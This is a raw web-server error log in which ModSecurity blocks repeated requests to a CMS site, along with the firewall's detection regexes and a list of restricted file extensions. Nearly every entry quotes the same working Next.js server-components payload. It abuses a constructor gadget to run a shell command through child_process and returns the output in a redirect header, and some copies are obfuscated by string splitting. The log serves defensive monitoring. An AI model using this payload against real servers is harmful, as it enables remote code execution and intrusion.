Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_xpyn};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/app/"] [unique_id "aYvpXh9ayL7wRi2xttsBYAAAAMA"] [Wed Feb 11 04:28:46.148651 2026] [:error] [pid 18849:tid 18864] [client 195.178.110.195:58824] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _xbjn=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _ayag=Buffer.from(_xbjn).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_ayag};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aYvpXh9ayL7wRi2xttsBYQAAAM0"] [Wed Feb 11 04:28:46.213116 2026] [:error] [pid 18849:tid 18875] [client 195.178.110.195:58824] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _kaco=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _swer=Buffer.from(_kaco).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_swer};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "aYvpXh9ayL7wRi2xttsBYgAAANg"] [Wed Feb 11 04:28:46.277907 2026] [:error] [pid 18849:tid 18865] [client 195.178.110.195:58824] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _krqt=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _dcxw=Buffer.from(_krqt).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_dcxw};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aYvpXh9ayL7wRi2xttsBYwAAAM4"] [Wed Feb 11 04:28:46.342350 2026] [:error] [pid 18849:tid 18870] [client 195.178.110.195:58824] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _vghr=process['main' 'Module']['req' 'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _moxg=Buffer.from(_vghr).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_moxg};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aYvpXh9ayL7wRi2xttsBZQAAANM"] [Wed Feb 11 04:28:46.405924 2026] [:error] [pid 18849:tid 18863] [client 195.178.110.195:58824] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _mpoo=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _sbya=Buffer.from(_mpoo).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_sbya};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/en/"] [unique_id "aYvpXh9ayL7wRi2xttsBZgAAAMw"] [Wed Feb 11 04:28:46.468875 2026] [:error] [pid 18849:tid 18854] [client 195.178.110.195:58824] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _wmju=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _sdtm=Buffer.from(_wmju).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_sdtm};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/app/"] [unique_id "aYvpXh9ayL7wRi2xttsBZwAAAMM"] [Wed Feb 11 04:28:46.532017 2026] [:error] [pid 18849:tid 18856] [client 195.178.110.195:58824] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _iquu=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _tehk=Buffer.from(_iquu).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_tehk};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aYvpXh9ayL7wRi2xttsBaAAAAMU"] [Wed Feb 11 04:28:46.594633 2026] [:error] [pid 18849:tid 18858] [client 195.178.110.195:58824] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _zphe=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _ehld=Buffer.from(_zphe).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_ehld};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "aYvpXh9ayL7wRi2xttsBaQAAAMc"] [Wed Feb 11 04:28:46.657648 2026] [:error] [pid 18849:tid 18873] [client 195.178.110.195:58824] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _mdxp=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _ffid=Buffer.from(_mdxp).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_ffid};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aYvpXh9ayL7wRi2xttsBagAAANY"] [Wed Feb 11 04:28:46.719900 2026] [:error] [pid 18849:tid 18861] [client 195.178.110.195:58824] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _nhbt=process['main' 'Module']['req' 'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _ebcg=Buffer.from(_nhbt).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_ebcg};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aYvpXh9ayL7wRi2xttsBawAAAMo"] [Wed Feb 11 04:28:46.783347 2026] [:error] [pid 18849:tid 18866] [client 195.178.110.195:58824] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _utzv=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _qgaf=Buffer.from(_utzv).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_qgaf};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/en/"] [unique_id "aYvpXh9ayL7wRi2xttsBbAAAAM8"] [Wed Feb 11 04:28:46.845211 2026] [:error] [pid 18849:tid 18874] [client 195.178.110.195:58824] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _pydx=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _gicz=Buffer.from(_pydx).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_gicz};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/app/"] [unique_id "aYvpXh9ayL7wRi2xttsBbgAAANc"] [Wed Feb 11 04:28:46.906038 2026] [:error] [pid 18849:tid 18855] [client 195.178.110.195:58824] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _zqep=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _blqi=Buffer.from(_zqep).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_blqi};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aYvpXh9ayL7wRi2xttsBbwAAAMQ"] [Wed Feb 11 04:28:46.966905 2026] [:error] [pid 18849:tid 18862] [client 195.178.110.195:58824] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _mlrg=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _kute=Buffer.from(_mlrg).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_kute};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "aYvpXh9ayL7wRi2xttsBcAAAAMs"] [Wed Feb 11 14:09:47.585595 2026] [autoindex:error] [pid 18635:tid 18723] [client 195.178.110.192:40682] AH01276: Cannot serve directory /home/id/cms-1.dev-unit.com/assets/front/img/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Feb 11 14:10:32.440014 2026] [:error] [pid 3834:tid 3846] [client 195.178.110.192:45566] [client 195.178.110.192] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/event/organize@gmail.com"] [unique_id "aYxxuJdVWwLN_O-Vwj6RCgAAAUg"] [Thu Feb 12 08:59:37.195168 2026] [:error] [pid 13989:tid 14007] [client 195.178.110.195:51190] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _bqyc=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _secx=Buffer.from(_bqyc).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_secx};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aY16WY_MCZZFujL22Y6oEwAAANA"] [Thu Feb 12 08:59:37.241536 2026] [:error] [pid 13989:tid 14005] [client 195.178.110.195:51190] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _nbhs=process['main' 'Module']['req' 'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _fcbs=Buffer.from(_nbhs).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_fcbs};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aY16WY_MCZZFujL22Y6oFAAAAM4"] [Thu Feb 12 08:59:37.284580 2026] [:error] [pid 13989:tid 13991] [client 195.178.110.195:51190] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _kuzp=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _fmkz=Buffer.from(_kuzp).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_fmkz};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/en/"] [unique_id "aY16WY_MCZZFujL22Y6oFQAAAMA"] [Thu Feb 12 08:59:37.327246 2026] [:error] [pid 13989:tid 13998] [client 195.178.110.195:51190] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _smac=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _xauq=Buffer.from(_smac).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_xauq};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/app/"] [unique_id "aY16WY_MCZZFujL22Y6oFgAAAMc"] [Thu Feb 12 08:59:37.371123 2026] [:error] [pid 13989:tid 14015] [client 195.178.110.195:51190] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file 